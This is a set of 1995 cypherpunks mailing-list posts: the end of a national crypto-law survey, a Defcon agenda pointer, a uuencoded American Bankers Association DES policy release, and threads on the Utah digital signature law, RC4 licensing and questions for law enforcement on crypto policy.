    _Turkey_ [1]
    2. no.
    3. no
    
    _United Kingdom_ [1, 3, 4, 5]
    1. COCOM regulations.
    2.  no
    3.  In its policy on the information superhighway, Labour states it does
    not approve of escrowed encryption, but it wishes authorities to have the
    power to demand decryption under judicial warrant.  It seems, then, that
    Labour intends to penalize a refusal to comply with a demand to decrypt
    under judicial warrant.
    
    _United States of America_ [1, 2, 4]
    1. The International Traffic in Arms Regulation restricts export of
    "dual-use" cryptography (that is, cryptography that can serve both
    civilian and military purposes) by placing it on the Munitions List. For
    (relatively strong) products that can encipher information, an export
    license is usually issued only for use by foreign branches of American
    enterprises and for use by financial institutions. "Weak" cryptography
    (e.g., with a certain maximum key-length) can also be exported.
    Export of cryptography that serves only authentication or integrity
    purposes is ruled by the Export Administration Regulations. Some types
    of public domain software have been decontrolled and are now on the
    Commerce Control List.
    Several initiatives, as yet unsuccessful, have been taken, both in
    Congress and by the public, to try to mitigate the cryptography export
    restrictions.
    2. no
    3. In 1993, the Clinton Administration announced the Escrowed
    Encryption Initiative (EEI), usually referred to as the Clipper Initiative,
    after its first implementation in the Clipper chip. A classified, secret-key
    algorithm, SKIPJACK, has been implemented in an Escrowed
    Encryption Standard (EES). The reported basic idea of the EEI is to
    provide citizens with a safe cryptosystem for securing their
    communications without threatening law enforcement.
    The EES procures law enforcement access by means of a Law
    Enforcement Access Field (LEAF) that is transmitted along with each
    encrypted message; the field contains information identifying the chip
    used. Law enforcement agencies wire-tapping communications
    encrypted with EES can decipher tapped messages by obtaining the two
    parts of the chip's master key that are deposited with two escrow
    agencies (National Institute of Standards and Technology
    and the Treasury Department's Automated Systems Division), provided
    they have a court order for the tapping.
    The EES is a voluntary standard to be used in telephone
    communications. Privacy advocates fear that the government may
    declare escrowed encryption obligatory once it has captured a
    sufficient portion of the market. It is doubtful that EES will be widely
    accepted, though, given the scepticism with which the majority of US
    citizens presently regard escrowed encryption or government access to
    keys.
    On June 27, 1995, Senator Grassley introduced the Anti-Electronic
    Racketeering Act (S.974), which, if enacted, would virtually ban
    encryption. Only the use of  escrow-like software would be an
    affirmative defense for those prosecuted for using cryptography. The bill
    doesn't seem to have much support at present.
    4. The Utah Digital Signatures Act of 1995 provides a legal framework
    for the use of cryptography for authentication and integrity purposes.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gt7508b@prism.gatech.edu (PHrEaK!)
Date: Wed, 26 Jul 95 10:25:56 PDT
To: skaplin@mirage.skypoint.com (Samuel Kaplin)
Subject: Re: Defcon agenda
In-Reply-To: <Pine.SV4.3.91.950726022003.29B-100000@mirage>
Message-ID: <199507261722.NAA22774@acmew.gatech.edu>
MIME-Version: 1.0
Content-Type: text


> Can some kind soul forward me a copy of the agenda for Defcon? I need 
> dates and times for the various speakers.
> 
> Thanks,
> Sam
> 
You can get it from http://underground.org/conventions/defcon/defcon3/


-- 
=-=-=-=-=-=-= Tom Cross AKA The White Ninja / Decius 6i5 */^\* -=-=-=-=-=-=-=-
-=-=-=-=-=- TWN615@mindvox.phantom.com  GT7508B@prism.gatech.edu =-=-=-=-=-=-=
=- "Government is not a reason, not an eloquence; it is a force. Like fire, =-
-=- it is a dangerous servant and a fearful master." -- George Washington -=-=



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: KDAGUIO@aba.com
Date: Wed, 26 Jul 95 11:32:57 PDT
To: Cypherpunks@toad.com
Subject: Banks and Crypto
Message-ID: <s0164c02.040@aba.com>
MIME-Version: 1.0
Content-Type: text/plain


See attached file: F:\OFFILES\KODMAIL.MSG

begin 666 KODMAIL.MSG
M````:!L``!L!A@```.X;```<`0,$``!T'```?V$Q5&5C:&YI8V%L````````
M````@51E8VAN:6-A;"!$;V-U;65N="!3='EL90``````````````````````
M```````````````````91@"RZ"$`$SP#``K4`0P```:)`#\`R``,``'4PP'#
MPPS#UP`%```%``#7V`$7`(``````````````````````22X7``'8(-D#!@``
M`08``]G9`P8``0`&``/9UP$%```%``'7"@K$`<3!`@@'"`</`,'$#,1_83=4
M96-H;FEC86P```````````"!5&5C:&YI8V%L($1O8W5M96YT(%-T>6QE````
M`````````````````````````````````````!HH`$`7`P!$Q@,`P0((!P@'
M#P#!PPS#V`$7`(8`````````````````````:2D7``'8("X@(,0,Q']A.%1E
M8VAN:6-A;````````````(%496-H;FEC86P@1&]C=6UE;G0@4W1Y;&4`````
M````````````````````````````````````&R@`X!H#`$3+`P#!`@@'"`</
M`,'##,/8`1<`AP````````````````````!A*1<``=@@+B`@Q`S$4&QE861I
M;F<``````````````````$AE861E<B!F;W(@;G5M8F5R960@<&QE861I;F<@
M<&%P97(````````````````````````````<JP-00```;KD``-``"````,@`
M"```T-`%#`"P!+`$(`/H`PP`!=#5`8L#``````````'(``(``````"1=T``(
M````R``(``#0T`$,`+`$L`18`K`$#``!T-`$T````%@"L`0(!V`)N`L0#F@0
MP!(8%7`7R!D@''@>T"`H(X`EV"<P*H@LX"XX,9`SZ#5`.)@Z\#Q(/Z!!____
M_________________________P``````````````````````````P`/_____
M____________________________________________________________
M______________________________________\@````````````````````
M`````+`$___0``30V@9Y````$`,(`/@J_`.P!```````````````````````
M````9`````````!D`&0`````````````````````````````````````````
M``````````````````````````````````$``````````````````````'D`
M!MK:!GD````0`P@`^"H4!+`$``````````````````````````!D````````
M`&0`9```````````````````````````````````````````````````````
M`````````````````````0``````````````````````>0`&V@H*P4A(`\`#
M!P#!,8,*"L%(2`/``P<`P3*#"@K!2$@#P`,'`,$S@PH*P4A(`\`#!P#!-(,*
M"L%(2`/``P<`P36#"@K!2$@#P`,'`,$V@PH*P4A(`\`#!P#!-X,*"L%(2`/`
M`P<`P3B#"@K!2$@#P`,'`,$Y@PH*P4C0`L`#!@#!,3"#"@K!2-`"P`,&`,$Q
M,8,*"L%(T`+``P8`P3$R@PH*P4C0`L`#!@#!,3.#"@K!2-`"P`,&`,$Q-(,*
M"L%(T`+``P8`P3$U@PH*P4C0`L`#!@#!,3:#"@K!2-`"P`,&`,$Q-X,*"L%(
MT`+``P8`P3$X@PH*P4C0`L`#!@#!,3F#"@K!2-`"P`,&`,$R,(,*"L%(T`+`
M`P8`P3(Q@PH*P4C0`L`#!@#!,C*#"@K!2-`"P`,&`,$R,X,*"L%(T`+``P8`
MP3(T@PH*P4C0`L`#!@#!,C6#"@K!2-`"P`,&`,$R-H,*"L%(T`+``P8`P3(W
M@PH*P4C0`L`#!@#!,CC3!@D``<`K(`,)``;3BP,!U?O_!0`R`*0E```=`7T!
M``"I(```'@%]`0``)B(``/__1````*,C```"`KT!``#G(P``4W1A9V5G=6ED
M90```````````````%-T86=I;F<@1W5I9&4@1F]R;6%T````````````````
M```````````````````````````````=)0'_E@``E0,``-$!(P``)@)D`(0<
M?!7\"``````00(X`-RY1$`,``3OV6`)`(P`!T=`%#`"P!+`$=`2P!`P`!=#0
M`0P`L`2P!(0#A`,,``'0T`30````6`*P!`@'8`FX"Q`.:!#`$A@5<!?(&2`<
M>![0("@C@"78)S`JB"S@+C@QD#/H-4`XF#KP/$@_H$'_________________
M____________```````````````````````````L`;X%>!C_____________
M____________________________________________________________
M_________________________P``````````````````````````L`2$`]``
M!-#0!@8``0`&``;04W1A9V5G`````````````````````%-T86=I;F<@1W5I
M9&4@1F]R;6%T('=I=&@@0V]U<FEE<B`Q,"!&;VYT```````````````````>
M)0&FW```:B\``-$!(P``]`%X`!0>#!>,"@````010,D`DSC'$3L``!\I6`)`
M(P`!T=`%#`"P!+`$=`2P!`P`!=#0`0P`L`2P!(0#A`,,``'0T`30````6`*P
M!`@'8`FX"Q`.:!#`$A@5<!?(&2`<>![0("@C@"78)S`JB"S@+C@QD#/H-4`X
MF#KP/$@_H$'_____________________________````````````````````
M```````L`;X%>!C_____________________________________________
M_____________________________________________________P``````
M````````````````````L`2$`]``!-#0!@8``0`&``;00T<@5&EM97,@0F]L
M9"`H4V-A;&%B;&4I`$=A;&QI87)D+5)O;6%N(#$R+C!P=`!'86QL:6%R9"U"
M;VQD(#$R+C!P=````2(`@@#_____;0'_____________________________
M7D,\9'AXB+`\4%!T>#Q,/(1X>'AX>'AX>'AX/#QX>'A,H)2,F*B,?*B\6%B<
MB,BLK(2PF'20L)C$D(B06%A8>&0\8'A8>%Q(<'@\.'`\L'AT='A44$QX9)QH
M9&!8/%AXZ41#:%```$1<?````$,`1'Q\?'Q\`&1\>#``E&"48)1@E&"48,2(
MF&N,7(Q<C%R,7%@\6#Q8/%@\K'BL=*QTK'28=+!XL'BP>+!XB&248)!XK'28
M=(ADJ'1V=)1@E&"48)A8F%B86)A8J'B,7(Q<C%R,7*APJ'"H<*APJ'"H<+QX
MO'A8,%@P6#Q8,*=@6`"<<(@\B#R(/&Q.;#BL>*R0K'BL>*QTK'3(M9A4F%28
M5'10@%!T4'10D$R03)!,L'BP>+!XL'BP>+!XQ)R(9)!@>&"08```J'B(/*QX
MF%1T4)!,B&2(9*AXK'2P>$Z0D)`\`'1TA$QO;WAXP7AT=+2T>$Q.9&1XM$P`
M0T,`9&1^R&AHR,A^?GIZF,ADR&209`")N;EZ>L@``````$-D````````9```
MR`#(``!,^_\%`#(`(2H``/__6P```-8E```#`KT!```Q)@``!P!V````[B<`
M``0"O0$``&0H``!#1R!4:6UE<R!";VQD("A38V%L86)L92D`1V%L;&EA<F0M
M4F]M86X@,3(N,'!T`$=A;&QI87)D+4)O;&0@,3(N,'!T`$=A;&QI87)D+4ET
M86QI8R`Q,BXP<'0```$B`((`_____VT!____________________________
M_UY#0%QH:(2\.%14;&@T1#1<:&AH:&AH:&AH:#0T:&AH4)"8?)2@?'"4K%10
MG'BTJ)AXF)Q@@*2(O)B,>%@T5&AD.&Q<3&Q,0&!@0#Q<.*1T5&!@5#A$=%R(
M8$Q86#18:.E(0U1$```X4'P```!#`#Q\?'Q\?`!D?&`P`)ALE&R8;)ALF&RX
M7)1K?$Q\3'Q,?$Q40%1`5$!40*ATF%285)A4F%2D=*1TI'2D=(Q,F&R0;)A4
MF%2,3*!4=F"8;)ALF&R43)1,E$R43*!L?$Q\3'Q,?$R48)1@E&"48)1@E&"L
M8*Q@5#!4,%1`5#"?8%``G%QX.'@X>#AL/VPPJ'2HE*ATJ'285)A4R+6<5)Q4
MG%1@.(`X8#A@.(!$@$2`1*1TI'2D=*1TI'2D=+R(C$QX6'A@>%@``*!L>#BH
M=)Q48#B`1(Q,C$R@;)A4I'1.D)"0-`!L;'A0;V]H:,%H;&R<G&A,3&1D:)Q,
M`$-#`&1D?LA86,C(?GYZ>IC(9,ADD&0`B;FY>GK(``````!#9````````&0`
M`,@`R```3$-'(%1I;65S($)O;&0@*%-C86QA8FQE*0!'86QL:6%R9"U2;VUA
M;B`Q,BXP<'0`1V%L;&EA<F0M0F]L9"`Q,BXP<'0`1V%L;&EA<F0M271A;&EC
M(#$R+C!P=`!'86QL:6%R9"U";VQD271A;&EC(#$R+C!P=````2(`@@#_____
M;0'_____________________________7D,X8&AH@+PX6%AT:#1(-%1H:&AH
M:&AH:&AH-#1H:&A0C)R$E*2$?)RT7%BD?+2HG("<H&2`I)3$F)1\6#18:&0X
M<&!,;%!$9&1,.&1`K'Q88&1</$1\9(QD5%A8-%AHZ4A#8$@``#Q<?````$,`
M0'Q\?'Q\`&1\8#``G'"4<)QPG'"<<,1DE&N$4(10A%"$4%Q,7$Q<3%Q,J'R<
M6)Q8G%B86*1\I'RD?*1\E%2<<)!LD%B86)14I%AV8)QPG'"<<)1,E$R43)1,
MI&R$4(10A%"$4)QDG&2<9)QDG&2<9+1DM&1<,%PP7$Q<,*=@6`"D9'Q`?$!\
M0&Q4;#BH?*B<J'RH?)Q8G%C(M:!<H%R@7&0\@#QD/&0\@$2`1(!$I'RD?*1\
MI'RD?*1\Q(R45'Q8>&!\6```I&Q\0*A\H%QD/(!$E%245*1LG%BD?$Z0D)`T
M`&QL@%!O;VAHQ&AL;)R<:$Y.9&1HG$X`0T,`9&1^R&!@R,A^?GIZF,ADR&20
M9`")N;EZ>L@``````$-D````````9```R`#(``!.^_\%`#(```````\`6@(`
M`%,J``#__R$````C!@``"``"````K2P```````````````"R`04`D0`W`'H`
M0P`[`"P!`0````%);%@">@#S&;@17P@````0('#L`%X0-Q+[`5@"D/[^_O[^
M_O[__O________[__________________________P8'#P"0`#@`;`!#`$,`
M+`$!`!D``'<CZ`)L`)`:1!%T"0``````4(8`?/I1`0,`6`)0_O[^_O[^_O\#
M____`O___O_______O[^_O___________O[^N`@7`(\`.0!T`$,`0P`L`0$`
M+P``NR8``W0`D!I$$9()``````!PA@`(+U$!`P!8`I#^_O[^_O[^__[_____
M___^_______^_O[^___________^_OZ0#?__CP`Y`&@`0P!#`"P!`0!$``#'
MBMP":`"0&J@1G`D*`````'B&`!2440$#`%@"6/[^_O[^_O[______P3___[_
M______[^_O[___________[^_B0+__^0`#@`;`!#`$,`+`$!`%L``"?$W`)L
M`)`:Y!%T"0H`````>(8`JO-1`0,`6`*8_O[^_O[^_O___________O______
M_O[^_O___________O[^_____P``9```R`#(``!,````````````````````
M````````````````````````````````````````````````````````````
M``````````````#_____`````````````````````````````````````.D`
M2`!#`%0`1```````.`!0`'P`````````0P```#P`?`!\`'P`?`!\````9`!\
M`&``,```````T`OW`)`SV"<!````````````````````````````````````
M````````````````````D#/8)P$(4W1A;F1A<F0`````````````````````
M````````````````````````D#/8)P$`````````````````````````````
M``````````````````````````"0,]@G`0!3=&%N9&%R9`!3!/__```#`')*
M970@24E)`!'__P```1?Z$1H`%!*I`@``1/NP!+`$L`2P!```````````````
M``````````$``````````````````````````````/<`"]!4:&4@06UE<FEC
M86X@0F%N:V5R<R!!<W-O8VEA=&EO;B!I<R!A='1E;7!T:6YG('1O(&%D9')E
M<W,@=&AE('!R:79A8WD@86YD('-E8W5R:71Y(&YE961S#6]F(&)A;FMS(&%N
M9"!B86YK(&-U<W1O;65R<R!B>2!E;G-U<FEN9R!T:&%T(&5A8V@@:&%V92!A
M8V-E<W,@=&\@87!P<F]P<FEA=&4-8W)Y<'1O9W)A<&AI8R!T;V]L<RX*"E1H
M92!!0D$@0W)Y<'1O9W)A<&AI8R!0;VQI8WD@=VEL;"!B92!P;W-T960@;VX@
M=&AI<R!L:7-T(&QA=&5R('1O9&%Y+@H*("`@("`@("`@*BHJ*BHJ*BHJ*BHJ
M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ"M0`'```%E\&
M`0```````````#`J,"HP*K`$L`0<``#4#`K0!0P`L`2P!+`$6`(,``70T`4,
M`+`$6`*P!+`$#``%T-`%#`"P!+`$L`18`@P`!=#0!0P`L`18`K`$L`0,``70
MT`4,`+`$L`2P!%@"#``%T-`%#`"P!%@"L`1H`0P`!=#0!0P`L`1H`;`$L`0,
M``70T`4,`+`$L`2P!%@"#``%T-`%#`"P!%@"L`2P!`P`!=#0!0P`L`2P!+`$
M6`(,``70"D-/3E1!0U0Z("!3;VYI82!"87)B87)AP0)H$&@0)@#!P0+`$L`2
M+`#!P0(8%1@5,@#!("`@("`@("`@1D]2($E-345$24%412!214Q%05-%"L$"
M"`<(!Q``P2`@("`@("`@("@R,#(I(#8V,ZDU-#8Y("`@("`@("`@("`@("`@
M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
M("`@*#$Y.34I"@K4`0P```:/`%H`C00,``'4PPS#T`8&```"!@`&T-0%"``7
M`!L'"``%U$%"02!214%&1DE235,@4U504$]25"!&3U(@4%))5D%41:E314-4
M3U(@0T].5%)/3"`*U`4(`"@`K0\(``743T8@0U)94%1/1U)!4$A9"M0%"``O
M`.P3"``%U,0,Q,,,P\,(PPK4!0@`"@`E!@@`!=1!<W-O8VEA=&EO;B!296-O
M;6UE;F1S(&$@,3"I>65A<B!%>'1E;G-I;VX@9F]R('1H92!$871A($5N8W)Y
M<'1I;VX@4W1A;F1A<F0*U`4(`"\`[!,(``74"M0!#```!I``60`:"0P``=34
M!0@`+P#L$P@`!=30!@8``@`&``;0U`4(``L`L`0(``74Q`S$Q`C$P0((!P@'
M$`#!T`((```!@`$(``+05T%32$E.1U1/3BP@2G5L>2`R,2"IJ2!4:&4@1&%T
M82!%;F-R>7!T:6]N(%-T86YD87)D("A$15,I('-H;W5L9"!B90UR96-E<G1I
M9FEE9"!F;W(@870@;&5A<W0@,3`@;6]R92!Y96%R<R!T;R!A;&QO=R!I;G1E
M<F5S=&5D(&9I;F%N8VEA;"!I;G-T:71U=&EO;G,@861E<75A=&4-=&EM92!T
M;R!C;VYV97)T('1O(&%N>2!N97<@8W)Y<'1O9W)A<&AY('-T86YD87)D+"!T
M:&4@06UE<FEC86X@0F%N:V5R<R!!<W-O8VEA=&EO;B!S86ED#6EN(&$@<&]L
M:6-Y('-T871E;65N="!I<W-U960@=&]D87DN"L$""`<(!Q``P45N8W)Y<'1I
M;VX@:7,@=&AE('!R;V-E<W,@=VAE<F5B>2!S96YS:71I=F4@9&%T82!C;VUM
M=6YI8V%T:6]N<RP@<W5C:"!A<R!W:7)E#71R86YS9F5R<RP@8W)E9&ET(&-A
M<F0@86YD(&%U=&]M871E9"!T96QL97(@;6%C:&EN92!T<F%N<V%C=&EO;G,L
M(&%R92!P<F]T96-T960@8GD@<V5C<F5T#6-O9&5S('1O('!R;W1E8W0@=&AE
M:7(@8V]N9FED96YT:6%L:71Y+B`@($1%4RP@<F5L96%S960@:6X@,3DW-RP@
M:7,@=&AE('!R:6UA<GD@;65T:&]D#75S960@8GD@9FEN86YC:6%L(&EN<W1I
M='5T:6]N<R!T;R!E;F-R>7!T(&EN9F]R;6%T:6]N+@K!`@@'"`<0`,%#<FET
M:6-S('-A>2!T:&%T('1H92!L;VYG97(@1$53(&ES('5S960L('1H92!M;W)E
M(&QI:V5L>2!I=',@8V]D92!C;W5L9"!B92!B<F]K96XN"E=H:6QE(')E86QI
M>FEN9R!T:&ES(&-O=6QD(&QI;6ET(&ET<R!L:69E('-P86X@87,@82!G;W9E
M<FYM96YT(&-E<G1I9FEE9"!S=&%N9&%R9"P@04)!#7=A<FYE9"!T:&%T(')E
M<75I<FEN9R!B86YK<R!T;R!C;VYV97)T('1O(&$@;F5W('-T86YD87)D(&)Y
M(#$Y.3@@*'1H92!Y96%R($1%4R=S#6-E<G1I9FEC871I;VX@97AP:7)E<RD@
M8V]U;&0@8F4@<')O:&EB:71I=F5L>2!C;W-T;'D@9'5E('1O('1H92!H:6=H
M(&QE=F5L(&]F(&5L96-T<F]N:6,@9G5N9',-=')A;G-F97)S('-E8W5R960@
M8GD@1$53+B`@04)!('1H97)E9F]R92!E;F-O=7)A9V5D('1H92!.871I;VYA
M;"!);G-T:71U=&4@9F]R(%-T86YD87)D<PUA;F0@5&5C:&YO;&]G>2`H3DE3
M5"D@=&\@8V]N=&EN=64@=&\@96YD;W)S92!$15,@87,@82!&961E<F%L($EN
M9F]R;6%T:6]N(%!R;V-E<W-I;F<-4W1A;F1A<F0@*$9)4%,I(&9O<B!U<V4@
M8GD@=&AE(&9I;F%N8VEA;"!C;VUM=6YI='DN"L$""`<(!Q``P51H97)E(&AA
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M(&9O<G5M('1O(&1E=F5L;W`@82!C;VUP<F5H96YS:79E('!O;&EC>2!O;B!T
M:&4@8V]M;65R8VEA;"!U<V4-;V8@8W)Y<'1O9W)A<&AY+B`*P0((!P@'$`#!
M26X@:71S(&YE=VQYJ7)E=FES960@<&]L:6-Y('-T871E;65N="!O;B!C<GEP
M=&]G<F%P:'DL($%"02!P<F]P;W-E9"!A;'1E<FYA=&EV97,@"G1O($1%4R!A
M;F0@;W5T;&EN960@;W1H97(@8W)I=&5R:6$@=&AA="!M=7-T(&)E(&UE="!B
M969O<F4@8VAA;F=E<R!I;B!C<GEP=&]G<F%P:&EC(`IS=&%N9&%R9',@8V%N
M(&)E(&%C8V5P=&5D(&)Y('1H92!B86YK:6YG(&EN9'5S=')Y+B`@(%1H97-E
M(&-R:71E<FEA(*FI('=H:6-H('=I;&P@8F4@U``<```6`2@"```````````#
M,"HP*C`JL`2P!!P``-2,T`8&```"!@`&T-0%"``L`*$2"``%U"AM;W)E*2`*
MU`4(`"\`[!,(``74T`8&``(`!@`&T-0%"``+`+`$"``%U`K4`0P```:/`%H`
MN@(,``'4PPS#04)!($-265!43T=205!(62!03TQ)0UDO4#(*U`$,```&D`!9
M`!<$#``!U,0,Q'!R97-E;G1E9"!N97AT('=E96L@=&\@<F5P<F5S96YT871I
M=F5S(&]F('1H92!7:&ET92!(;W5S92P@52Y3+B!$97!A<G1M96YT(&]F#4-O
M;6UE<F-E+"!.871I;VYA;"!396-U<FET>2!!9V5N8WD@*$Y302D@86YD(&9E
M9&5R86P@8F%N:VEN9R!A9V5N8VEE<R"IJ2!W97)E#61E=F5L;W!E9"!F;VQL
M;W=I;F<@82!T=V^I9&%Y(&UE971I;F<@:&5L9"!I;B!*=6YE(&]F(&)A;FME
M<G,L('9E;F1O<G,@86YD(&-R>7!T;PUE>'!E<G1S(&-O;F-E<FYE9"!A8F]U
M="!T:&4@9F5D97)A;"!G;W9E<FYM96YT)W,@9&ER96-T:6]N(')E9V%R9&EN
M9R!P<FEV871EJ7-E8W1O<@UI;F9O<FUA=&EO;B!S96-U<FET>2X@"L$""`<(
M!Q``P5-P96-I9FEC86QL>2P@04)!(')E8V]M;65N9&5D.@K!`@@'"`<0`,'`
M`@3`("!4:&4@9FEN86YC:6%L('-E<G9I8V5S(&EN9'5S=')Y(&)E(&%L;&]W
M960@=&\@8V]N=&EN=64@=&\@=7-E($1%4R!B87-E9"!O;B!R:7-K#<$""`<(
M!Q``P6%S<V5S<VUE;G0@*&4N9RX@=F%L=64@;V8@=&AE('1R86YS86-T:6]N
M*2!A;F0@=&AE(&)U<VEN97-S(&%P<&QI8V%T:6]N(&EN=F]L=F5D+B`*P0((
M!P@'$`#!P`($P"`@02!S96-U<FET>2!F<F%M97=O<FL@96YC;VUP87-S:6YG
M(&$@9F%M:6QY(&]F(&-O;6UE<F-I86QL>2!A=F%I;&%B;&4-P0((!P@'$`#!
M86QG;W)I=&AM<RP@:6YC;'5D:6YG($1%4RP@8F4@9&5V96QO<&5D+B`@5&AI
M<R!F<F%M97=O<FL@<VAO=6QD(&EN8VQU9&4@80W!`@@'"`<0`,%P<F]C97-S
M(&9O<B!N96=O=&EA=&5D(&%L9V]R:71H;2!S96QE8W1I;VX@8F%S960@;VX@
M=&AE(&QE=F5L(&]F(')I<VL@86YD(&]T:&5R#<$""`<(!Q``P6)U<VEN97-S
M(')E<75I<F5M96YT<RX@(`K!`@@'"`<0`,'``@3`($]P<&]S:71I;VX@=&\@
M9V]V97)N;65N="!M86YD871E9"!K97D@;6%N86=E;65N="!S>7-T96US(&9O
M<B!F:6YA;F-I86P-P0((!P@'$`#!87!P;&EC871I;VYS('=H97)E(&ME>7,@
M=V]U;&0@:&%V92!T;R!B92!S=&]R960@;W5T<VED92!T:&4@9FEN86YC:6%L
M(&EN<W1I='5T:6]N#<$""`<(!Q``P2AE+F<N(&ME>2!R96=I<W1R871I;VXO
M<W5R<F5N9&5R(&]R('1H92!M86YD871O<GD@97-C<F]W(&]F(&-R>7!T;V=R
M87!H:6,@:V5Y<RDN(`W!`@@'"`<0`,%);G-T96%D+"!B86YK<R!S:&]U;&0@
M8V]N=&EN=64@=&\@8F4@<F5S<&]N<VEB;&4@9F]R(&ME>2!M86YA9V5M96YT
M(&%N9`W!`@@'"`<0`,%C;VYT:6YU92!T;R!C;V]P97)A=&4@=VET:"!G;W9E
M<FYM96YT(&9O<B!L87<@96YF;W)C96UE;G0@<'5R<&]S97,L(&%S(')E<75I
M<F5D#<$"$2,1(U,`P6)Y(&QA=RX*(,$""`<(!Q0`P<`"!,`@17AP;W)T(&]F
M(&-R>7!T;V=R87!H>2!F;W(@9FEN86YC:6%L(&%P<&QI8V%T:6]N<R!M=7-T
M(&YO="!B92!R97-T<FEC=&5D+@K!`@@'"`<4`,'``@3`($9U;&P@<&%R=&EC
M:7!A=&EO;B!O9B!#;VYG<F5S<R!A;F0@=&AE('!R:79A=&4@<V5C=&]R(&)E
M9F]R92!E<W1A8FQI<VAI;F<@82!5+E,N#<$""`<(!Q0`P7!O;&EC>2!F;W(@
M=&AE(&-O;6UE<F-I86P@=7-E(&]F(&-R>7!T;V=R87!H>2P@:6YS=&5A9"!O
M9B!B96EN9R!C87)R:65D(&]U="!S;VQE;'D-P0((!P@'%`#!8GD@17AE8W5T
M:79E($]R9&5R+@K!`@@'"`<4`,%;3F]T93H@(%1H97-E(')E8V]M;65N9&%T
M:6]N<R!W97)E('-U;6UA<FEZ960N("!&;W(@=&AE(&9U;&P@<W1A=&5M96YT
M+"!P;&5A<V4-P0((!P@'%`#!8V%L;"!3;VYI82!"87)B87)A(&%T(#(P,B\V
M-C.I-30V.2Y="L$""`<(!Q0`P=`""`"``0`!"``"T%1H92!!;65R:6-A;B!"
M86YK97)S($%S<V]C:6%T:6]N(&ES('1H92!O;FQY(&YA=&EO;F%L('1R861E
M(&%N9"!P<F]F97-S:6]N86P-87-S;V-I871I;VX@<V5R=FEN9R!T:&4@96YT
M:7)E(&)A;FMI;F<@8V]M;75N:71Y+"!F<F]M('-M86QL(&-O;6UU;FET>2!B
M86YK<R!T;R!L87)G90UB86YK(&AO;&1I;F<@8V]M<&%N:65S+B`@04)!(&UE
M;6)E<G,@<F5P<F5S96YT(&%P<')O>&EM871E;'D@.3`@<&5R8V5N="!O9B!T
M:&4-8V]M;65R8VEA;"!B86YK:6YG(&EN9'5S=')Y)W,@=&]T86P@87-S971S
M+"!A;F0@86)O=70@.30@<&5R8V5N="!O9B!!0D$@;65M8F5R<R!A<F4-8V]M
M;75N:71Y(&)A;FMS('=I=&@@87-S971S(&QE<W,@=&AA;B`D-3`P(&UI;&QI
1;VXN"L'@1!/L$S@`P2,C(X/!
`
end





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "greg pitz" <pitz@onetouch.com>
Date: Wed, 26 Jul 95 13:48:40 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto Law Survey
Message-ID: <9507262045.AA18413@onetouch.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 26 Jul 1995 15:28:43 Michael Froomkin wrote:

> few years.   Second, the American Bar Association Section on 
> Science and Technology's Information Security Committee is 
> drafting Guidelines and Model Legislation which, if they are 
> ever completed, will improve upon the Utah initiative.  

Would someone be so kind as to describe the Utah initiative?  I 
wasn't able to find a further description in my precursory search of 
Mr Froomkin's otherwise very informative home page

http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html

...................
pitz@onetouch.com
greg pitz      ..





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rross@sci.dixie.edu (Russell Ross)
Date: Wed, 26 Jul 95 12:38:46 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: RC4
Message-ID: <v01520d01ac3c496012a1@[144.38.16.209]>
MIME-Version: 1.0
Content-Type: text/plain


>From: Alex Tang <altitude@umich.edu>
>> I talked with RSA yesterday specifically about free servers and RC4.
>> They just said that they would need a business plan for the
>> server product.  When i said that the product would be free, they started
>> talking in circles about how everyone who uses RC4 needed a license (but i
>> was asking about the licenses...)  I asked flat out "how much would a
>> license for RC4 cost for a free server product".  They only responded with
>> "Very Expensive", and then went on about a business plan.
>
>Ask them about the free version of RC4 which is circulating.  If they say
>it is patented ask them for the patent number.  Ask them why you should
>pay them big bucks if you can get it for free.

Here's their reply to a similar correspondence:

>The RC4 algorithm is copyrighted by and intellectual property of RSA Data
>Security.  For use of this algorithm in a product or service you plan to
>sell, you may use the RC4 software implementation from our BSAFE toolkit.
>Licenses are not available for other commercial software implementations of
>this algorithm other than what is included in our BSAFE toolkit.

I wasn't aware that you could copyright an algorithm.  Patent, yes, but not
copyright.  Intellectual property means secret, right?  Aren't there any
precedent cases involving proprietary schemes that are reverse engineered?
I know there have been, I just can't remember what they are.  In any case,
RSADSI is likely to sue anyone who attempts to use the RC4 code openly, and
even if they lose there are considerable legal fees involved for whoever
tries it.  What if a bunch of people put secure HTTPd servers online at the
same time, without any clear trail pointing to the first one?  If the RC4
code really is legal to use, this would make it hard for RSADSI to pinpoint
anyone to sue, thus eliminating the intimidation factor.

By the way, since RSA is such a vocal opponent of the Clipper chip on the
grounds of its secret Skipjack algorithm, why does it market secret
algorithms like RC4 and RC2?  Does this seem like a double face to anyone
else?

-----------------------------------------------------------
Russell Ross                     email: rross@sci.dixie.edu
1260 N 1280 W                    voice: (801)628-8146
St. George, UT 84770-4953






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mkj@october.ducktown.org
Date: Wed, 26 Jul 95 11:40:15 PDT
To: cypherpunks@toad.com
Subject: Re: NRC panel wants questions for Law Enforcement on crypto policy
Message-ID: <199507261746.NAA00249@october.ducktown.org>
MIME-Version: 1.0
Content-Type: text/plain


----- Forwarded message from David Lesher -----

>In April, gnu asked:
>> Herb Lin called today to ask if the Cypherpunks could come up with a
>> list of questions for their panel to ask the law enforcement community
>> about crypto policy.  They will be meeting with senior law enforcement
>> officials like FBI Director Freeh a week or so from now.
>
>Did we ever get any feedback on this?
>
>- -- 
>A host is a host from coast to coast.................wb8foz@nrk.com
>& no one will talk to a host that's close........[v].(301) 56-LINUX
>Unless the host (that isn't close).........................pob 1433
>is busy, hung or dead....................................20915-1433

----- End of forwarded message from David Lesher -----

I'm glad you brought that up.  Having contributed some questions myself, I
was hoping to get some kind of feedback.  I didn't expect transcripts of any
top-secret meetings or anything, but the whole subject seems to have fallen
into a black hole; we don't even know whether the meetings ever took place.

If possible, it would be great to hear at least general reactions to at
least some of the questions and issues we raised.

